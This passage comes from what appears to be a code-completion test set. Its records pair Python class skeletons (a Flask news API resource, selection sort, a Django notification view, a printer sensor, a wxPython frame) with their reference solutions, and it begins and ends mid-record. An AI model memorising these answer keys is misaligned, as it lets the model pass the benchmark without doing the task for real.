本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201", "prompted_full_text": "Implement the Python class `FetchResultListResource` described below.\n\nClass description:\nFetchResultListResource\n\nMethod signatures and docstrings:\n- def get(self): Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\n- def post(self): Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"

本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\n\n<|skeleton|>\nclass FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"

本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n<|end_body_0|>\n\n<|body_start_1|>\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n<|end_body_1|>\n", "revision_id": "6ef54f3f7efbbaff6169e963dcf45ab25e11e593", "skeleton": "<|skeleton|>\nclass FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"

本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FetchResultListResource:\n \"\"\"FetchResultListResource\"\"\"\n\n def get(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results curl http://0.0.0.0:5000/news/fetch_results?last_pk=1000&limit_num=2 :return:\"\"\"\n filter_parser = reqparse.RequestParser(bundle_errors=True)\n filter_parser.add_argument('last_pk', type=int, default=0, location='args')\n filter_parser.add_argument('limit_num', type=int, default=20, location='args')\n filter_parser_args = filter_parser.parse_args()\n data = get_fetch_result_limit_rows_by_last_id(**filter_parser_args)\n result = marshal(data, fields_item_fetch_result, envelope=structure_key_items)\n return jsonify(result)\n\n def post(self):\n \"\"\"Example: curl http://0.0.0.0:5000/news/fetch_results -H \"Content-Type: application/json\" -X POST -d ' { \"fetch_result\": { \"task_id\": 14, \"platform_id\": 3, \"platform_name\": \"头条_post\", \"channel_id\": 0, \"channel_name\": \"\", \"article_id\": \"6527896212211761677\", \"article_url\": \"https://www.toutiao.com/i6527896212211761677/\", \"article_title\": \"【交易机会】澳美短线或继续回调,中长线仍旧看多\", \"article_author_id\": \"69781315016\", \"article_author_name\": \"恒信贵金属\", \"article_tags\": \"外汇,经济,贵金属,斐波那契,投资\", \"article_abstract\": \"本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。\", \"article_content\": \"

本周,在新任美联储主席鲍威尔国会首秀发表鹰派言论之后,近期在90下方苦苦挣扎的美元指数迅速上涨并且一举突破90阻力。但是需要注意的是,美元靓丽的表现可能只是短期的超跌反弹而已,中长线美元依旧缺乏上涨的动力。因为此前市场普遍预期美联储在201\"\"\"\n request_args = request_parser.parse_args()\n request_item_args = request_parser_item_post.parse_args(req=request_args)\n if not request_item_args:\n raise BadRequest('Bad request.')\n request_data = request_item_args\n result = add_fetch_result(request_data)\n if result:\n success_msg = SUCCESS_MSG.copy()\n success_msg['id'] = result\n return make_response(jsonify(success_msg), 201)\n else:\n failure_msg = FAILURE_MSG.copy()\n return make_response(jsonify(failure_msg), 400)\n", "source": "the_stack_v2_python_sparse", "source_path": "web_api/news/resources/fetch_result.py", "source_repo": "zhanghe06/flask_restful", "split": "test", "star_events_count": 2} {"blob_id": "d00aba6c37f9bb09f46592d521c1758c3ed33fa7", "bodies": ["if arr is None:\n return arr\nn = len(arr)\nif n <= 1:\n return arr\nfor i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\nreturn arr", "if arr is None:\n return arr\nn = len(arr)\nif n <= 1:\n return arr\nfor i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\nreturn arr"], "bodies_text": "<|body_start_0|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n<|end_body_0|>\n\n<|body_start_1|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SelectionSort", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SelectionSort:\n\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_0|>\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n<|end_body_0|>\n\n<|body_start_1|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000138", "length_bytes": 2594, "license_type": "permissive", "methods": [{"docstring": "Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list", "name": "selection_sort_min_version", "signature": "def selection_sort_min_version(arr)"}, {"docstring": "Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list", "name": "selection_sort_max_version", "signature": "def selection_sort_max_version(arr)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003866", "prompt": "Implement the Python class `SelectionSort` described below.\n\nClass description:\nImplement the SelectionSort class.\n\nMethod signatures and docstrings:\n- def selection_sort_min_version(arr): Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\n- def selection_sort_max_version(arr): Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list", "prompted_full_text": "Implement the Python class `SelectionSort` described below.\n\nClass description:\nImplement the SelectionSort class.\n\nMethod signatures and docstrings:\n- def selection_sort_min_version(arr): Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\n- def selection_sort_max_version(arr): Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\n\n<|skeleton|>\nclass SelectionSort:\n\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_0|>\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n<|end_body_0|>\n\n<|body_start_1|>\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n<|end_body_1|>\n", "revision_id": "8504db89a3f6a1596c0bb7343a4936884b44e6ea", "skeleton": "<|skeleton|>\nclass SelectionSort:\n\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_0|>\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SelectionSort:\n def selection_sort_min_version(arr):\n \"\"\"Selection sort in selecting-min-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(0, n):\n min_index = i\n j = i + 1\n while j < n:\n if arr[j] < arr[min_index]:\n min_index = j\n j += 1\n arr[i], arr[min_index] = (arr[min_index], arr[i])\n return arr\n\n def selection_sort_max_version(arr):\n \"\"\"Selection sort in selecting-max-element style. Note that selection is the slowest of all the common sorting algorithms. It requires quadratic time even in the best case (i.e., when the array is already sorted). :param arr: List[int], list to be sorted :return: List[int], sorted list\"\"\"\n if arr is None:\n return arr\n n = len(arr)\n if n <= 1:\n return arr\n for i in range(n - 1, 0, -1):\n max_index = i\n j = i - 1\n while j >= 0:\n if arr[j] > arr[max_index]:\n max_index = j\n j -= 1\n arr[i], arr[max_index] = (arr[max_index], arr[i])\n return arr\n", "source": "the_stack_v2_python_sparse", "source_path": "sorting/selection_sort.py", "source_repo": "fimh/dsa-py", "split": "test", "star_events_count": 2} {"blob_id": "bfddf40cb678c98d2b73767b34afb4259402e163", "bodies": ["user = request.user\nnotifications = Notification.objects.all()\ndata = {}\nfor notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\nreturn Response(data, status=status.HTTP_200_OK)", "notifications = Notification.objects.all()\nuser = request.user\nfor notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\nreturn Response(response, status=status.HTTP_200_OK)"], "bodies_text": "<|body_start_0|>\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n<|end_body_1|>\n", "class_docstring": "get:", "class_name": "NotificationAPIView", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\"\"\"\n <|body_0|>\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000139", "length_bytes": 7717, "license_type": "permissive", "methods": [{"docstring": "Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications", "name": "get", "signature": "def get(self, request)"}, {"docstring": "Mark all notifications as read.", "name": "put", "signature": "def put(self, request)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001101", "prompt": "Implement the Python class `NotificationAPIView` described below.\n\nClass description:\nget:\n\nMethod signatures and docstrings:\n- def get(self, request): Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\n- def put(self, request): Mark all notifications as read.", "prompted_full_text": "Implement the Python class `NotificationAPIView` described below.\n\nClass description:\nget:\n\nMethod signatures and docstrings:\n- def get(self, request): Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\n- def put(self, request): Mark all notifications as read.\n\n<|skeleton|>\nclass NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\"\"\"\n <|body_0|>\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n<|end_body_1|>\n", "revision_id": "daf55ce4819f57cec8510c5726e86a0b1e78e3e1", "skeleton": "<|skeleton|>\nclass NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\"\"\"\n <|body_0|>\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NotificationAPIView:\n \"\"\"get:\"\"\"\n\n def get(self, request):\n \"\"\"Retrieve all notifications from the database for a specific user. :returns notifications: a json data for the notifications\"\"\"\n user = request.user\n notifications = Notification.objects.all()\n data = {}\n for notification in notifications:\n if user in notification.notified.all():\n serializer = self.serializer_class(notification, context={'request': request})\n data[notification.id] = serializer.data\n return Response(data, status=status.HTTP_200_OK)\n\n def put(self, request):\n \"\"\"Mark all notifications as read.\"\"\"\n notifications = Notification.objects.all()\n user = request.user\n for notification in notifications:\n if user in notification.notified.all():\n notification.read.add(user.id)\n notification.save()\n message = 'You successfully marked all notifications as read'\n response = {'message': message}\n return Response(response, status=status.HTTP_200_OK)\n", "source": "the_stack_v2_python_sparse", "source_path": "authors/apps/notifications/views.py", "source_repo": "andela/ah-magnificent6", "split": "test", "star_events_count": 0} {"blob_id": "360344bffecce399a668c5a77d9d76a15d9dd637", "bodies": ["super().__init__(syncthru, name)\nself._id_suffix = '_main'\nself._active = True", "if not self._active:\n return\ntry:\n await self.syncthru.update()\nexcept ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\nself._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\nself._attributes = {'display_text': self.syncthru.device_status_details()}"], "bodies_text": "<|body_start_0|>\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n<|end_body_0|>\n\n<|body_start_1|>\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n<|end_body_1|>\n", "class_docstring": "Implementation of the main sensor, conducting the actual polling.", "class_name": "SyncThruMainSensor", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n<|end_body_0|>\n\n<|body_start_1|>\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000140", "length_bytes": 8262, "license_type": "permissive", "methods": [{"docstring": "Initialize the sensor.", "name": "__init__", "signature": "def __init__(self, syncthru, name)"}, {"docstring": "Get the latest data from SyncThru and update the state.", "name": "async_update", "signature": "async def async_update(self)"}], "n_methods": 2, "prompt": "Implement the Python class `SyncThruMainSensor` described below.\n\nClass description:\nImplementation of the main sensor, conducting the actual polling.\n\nMethod signatures and docstrings:\n- def __init__(self, syncthru, name): Initialize the sensor.\n- async def async_update(self): Get the latest data from SyncThru and update the state.", "prompted_full_text": "Implement the Python class `SyncThruMainSensor` described below.\n\nClass description:\nImplementation of the main sensor, conducting the actual polling.\n\nMethod signatures and docstrings:\n- def __init__(self, syncthru, name): Initialize the sensor.\n- async def async_update(self): Get the latest data from SyncThru and update the state.\n\n<|skeleton|>\nclass SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n<|end_body_0|>\n\n<|body_start_1|>\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n<|end_body_1|>\n", "revision_id": "ed4ab403deaed9e8c95e0db728477fcb012bf4fa", "skeleton": "<|skeleton|>\nclass SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SyncThruMainSensor:\n \"\"\"Implementation of the main sensor, conducting the actual polling.\"\"\"\n\n def __init__(self, syncthru, name):\n \"\"\"Initialize the sensor.\"\"\"\n super().__init__(syncthru, name)\n self._id_suffix = '_main'\n self._active = True\n\n async def async_update(self):\n \"\"\"Get the latest data from SyncThru and update the state.\"\"\"\n if not self._active:\n return\n try:\n await self.syncthru.update()\n except ValueError:\n _LOGGER.warning('Configured printer at %s does not support SyncThru. Consider changing your configuration', self.syncthru.url)\n self._active = False\n self._state = SYNCTHRU_STATE_HUMAN[self.syncthru.device_status()]\n self._attributes = {'display_text': self.syncthru.device_status_details()}\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/syncthru/sensor.py", "source_repo": "tchellomello/home-assistant", "split": "test", "star_events_count": 8} {"blob_id": "5b02ee3954eca5435824b3b552575275d60cac50", "bodies": ["wx.Frame.__init__(self, parent, id, 'wxYield Test')\nwx.Button(self, ID_START, 'Start', pos=(0, 0))\nwx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\nself.status = wx.StaticText(self, -1, '', pos=(0, 100))\nself.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\nself.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\nself.working = 0", "if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0", "if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1"], "bodies_text": "<|body_start_0|>\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n<|end_body_1|>\n\n<|body_start_2|>\n if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n<|end_body_2|>\n", "class_docstring": "Class MainFrame.", "class_name": "MainFrame", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n <|body_0|>\n\n def OnStart(self, event):\n \"\"\"Start Computation.\"\"\"\n <|body_1|>\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n<|end_body_1|>\n\n<|body_start_2|>\n if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000141", "length_bytes": 3167, "license_type": "no_license", "methods": [{"docstring": "Create the MainFrame.", "name": "__init__", "signature": "def __init__(self, parent, id)"}, {"docstring": "Start Computation.", "name": "OnStart", "signature": "def OnStart(self, event)"}, {"docstring": "Stop Computation.", "name": "OnStop", "signature": "def OnStop(self, event)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000570", "prompt": "Implement the Python class `MainFrame` described below.\n\nClass description:\nClass MainFrame.\n\nMethod signatures and docstrings:\n- def __init__(self, parent, id): Create the MainFrame.\n- def OnStart(self, event): Start Computation.\n- def OnStop(self, event): Stop Computation.", "prompted_full_text": "Implement the Python class `MainFrame` described below.\n\nClass description:\nClass MainFrame.\n\nMethod signatures and docstrings:\n- def __init__(self, parent, id): Create the MainFrame.\n- def OnStart(self, event): Start Computation.\n- def OnStop(self, event): Stop Computation.\n\n<|skeleton|>\nclass MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n <|body_0|>\n\n def OnStart(self, event):\n \"\"\"Start 